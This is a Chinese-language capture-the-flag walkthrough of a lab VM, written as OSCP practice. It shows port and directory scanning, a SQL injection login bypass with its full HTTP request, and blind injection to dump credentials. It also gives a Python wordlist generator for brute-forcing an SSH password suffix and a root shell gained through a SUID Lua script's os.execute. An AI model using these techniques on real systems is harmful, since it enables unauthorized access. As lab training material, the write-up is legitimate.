前言
最近花点儿时间刷刷靶场找找感觉考个OSCP,遇见了这个靶机比较有意思,分享一下。
信息搜集
资产探测可以直接扫描,探测网卡网都可以,nat模式比较省时间,桥接的话小型局域网比较省时间,扫描端口
nmap -A -p- 192.168.0.104
data:image/s3,"s3://crabby-images/01668/01668c3e59b43bd0cf9178609ab41a922b0b9742" alt=""
首先就是ftp匿名登录,读取文件内容
get locale.txt
cat local.txt
...
data:image/s3,"s3://crabby-images/32c13/32c135189cb7d96f00a208532f9357d438154285" alt=""
base64解码发现也是无用。继续根据搜集到的端口信息进行信息搜集,目录扫描常见工具都可,kali下的自带工具免安装有dirb
data:image/s3,"s3://crabby-images/15172/15172e18ee9e2edad8194936acc0d25223ec1091" alt=""
dirb http://192.168.0.104/ /usr/share/wordlists/dirb/big.txt -t 100
进程并发100,字典默认够用了
data:image/s3,"s3://crabby-images/2239a/2239a103656c93d5f05fa550bb065a5f5fee78eb" alt=""
data:image/s3,"s3://crabby-images/0b481/0b4815780ddfb07acbad51800511dedba3afd318" alt=""
数据库并不是弱口令,利用数据库写shell利用不了,换个方向,查看应用界面
data:image/s3,"s3://crabby-images/09a43/09a43270e082bd7b7b5d6658db1af6943e0526f9" alt=""
源码可知为cms ColdFusion
data:image/s3,"s3://crabby-images/57008/5700841eb57455aa23286f30f785f56040d76f6d" alt=""
查询历史漏洞发现路径
/CFIDE/
data:image/s3,"s3://crabby-images/4c4fc/4c4fce88108ccc7cea2fc93eeb6184af22512854" alt=""
目录遍历
data:image/s3,"s3://crabby-images/076e0/076e0e81501ee6e2da3e2ad9d279a653db8f0120" alt=""
Administrator下无内容,继续进行目录扫描
data:image/s3,"s3://crabby-images/f8991/f89914feda7b506a61b94217f446a79b35e1e87a" alt=""
SQL注入
admin' or 1=1#/1
data:image/s3,"s3://crabby-images/c1285/c1285807cb13a81cce58db13347e96b819066de3" alt=""
单引号闭合,sql注入,直接用工具跑,抛出用户名以及密码尝试登录ssh
POST /CFIDE/Administrator/login.php HTTP/1.1
Host: 192.168.0.104
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://192.168.0.104
Connection: close
Referer: http://192.168.0.104/CFIDE/Administrator/login.php
Upgrade-Insecure-Requests: 1
uname=admin%27+or+1%3D1%23&pswd=s
盲注
data:image/s3,"s3://crabby-images/c7f5e/c7f5e605c17d7133d0a913e8cec2343dd5044bbf" alt=""
一步步爆库爆表
data:image/s3,"s3://crabby-images/85ff1/85ff114011141852c64a2cb1e5e328905490e4bd" alt=""
三个用户名和密码只有第二个可以解密
data:image/s3,"s3://crabby-images/39c53/39c53369c936b89dca98ce77ea955a2188d15a1c" alt=""
data:image/s3,"s3://crabby-images/2197f/2197f72f15cbbd31fe70cfce2ecbf21346373f73" alt=""
data:image/s3,"s3://crabby-images/28183/28183a342615d1703a4c015913087284e726de97" alt=""
二次信息搜集
尝试提权,未果
home
目录下存在用户sword
,但是没有权限切过去,信息搜集过程中发现路径
/var/backups/reminder
存在用户sword
的密码,但是缺少几位
data:image/s3,"s3://crabby-images/bbe29/bbe299c05e4bea6a7c1fabf04c8cad68b6d7f359" alt=""
后四位缺少数字,爆破
- 使用爆破工具ssh爆破,写个后四位的密码库
- 使用自带工具爆破后四位
# -*- coding: utf-8 -*-
# 打开文件
file = open("output.txt", "w")
# 循环遍历四位数字
for i in range(10000):
# 格式化字符串
password = "P4SsW0rD{0:04}".format(i)
# 将密码写入文件
file.write(password + "\n")
# 关闭文件
file.close()
file.close()
file.close()
data:image/s3,"s3://crabby-images/7336f/7336f4ab207f0d7a3954b2c7eb2adde59ce46c2a" alt=""
爆破出密码为P4SsW0rD4286
data:image/s3,"s3://crabby-images/4a1fd/4a1fd30647798042a9857a5e8261b4748602e70f" alt=""
提权
登录用户sword
data:image/s3,"s3://crabby-images/d9ab4/d9ab4916be7f8e69d4ac68f446670f1850bcb0ef" alt=""
find / -perm -u=s -type f 2>/dev/null
data:image/s3,"s3://crabby-images/a1b31/a1b311bff55b8432b44f602c8de53254db3de3d1" alt=""
cd /usr/games/clover
./deamon.sh
lua提权
os.execute("/bin/sh")
读取最后的flag
data:image/s3,"s3://crabby-images/b6053/b6053654884d06782c8638b75ae9c1a9c349f1ad" alt=""